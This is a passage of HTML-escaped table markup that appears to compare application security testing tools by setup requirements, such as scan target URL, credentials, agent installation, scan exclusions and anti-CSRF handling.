&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Required&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Required&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Configure App URL&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Explicitly define scan target in scan
  policy/configuration&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: 8.0pt;&quot;&gt;&lt;b&gt;Common&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Define URL
  in Scan Policy&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Source
  Control Path&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Licensing
  Purposes&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Define URL
  in Scan Policy&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Define Credentials&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Define credentials / login scenarios in
  the scan policy&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: 8.0pt;&quot;&gt;&lt;b&gt;Common&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Define Credentials
  AND Login Sequence&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Define
  Source Control Credentials (Optional)&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Define Credentials
  AND Login Sequence&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Install an Agent&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Install a “scan” agent on the tested
  system framework&lt;/span&gt;&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: 8.0pt;&quot;&gt;&lt;b&gt;Common&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Required&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Required&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Define Scan Exclusions&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Configure “forbidden” pages and
  parameters to scan (logout, delete, etc)&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: red; font-size: 8.0pt;&quot;&gt;&lt;b&gt;Situational&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;span style=&quot;color: red; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 107.75pt;&quot; valign=&quot;top&quot; width=&quot;144&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 10.0pt;&quot;&gt;Handle Scan Barriers&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Configure/flag anti-CSRF parameters,
  custom tokens,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size: 10.6667px;&quot;&gt;complex login scenarios (micro-services), or record multi-phase processes&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: red; font-size: 8.0pt;&quot;&gt;&lt;b&gt;Situational&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.5pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Possible,
  Policy Specific&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.25in;&quot; valign=&quot;top&quot; width=&quot;120&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;span style=&quot;color: red; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 81.0pt;&quot; valign=&quot;top&quot; width=&quot;108&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;X&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Not Required&lt;/span&gt;&lt;span style=&quot;color: #00b050; font-size: 16.0pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 94.25pt;&quot; valign=&quot;top&quot; width=&quot;126&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
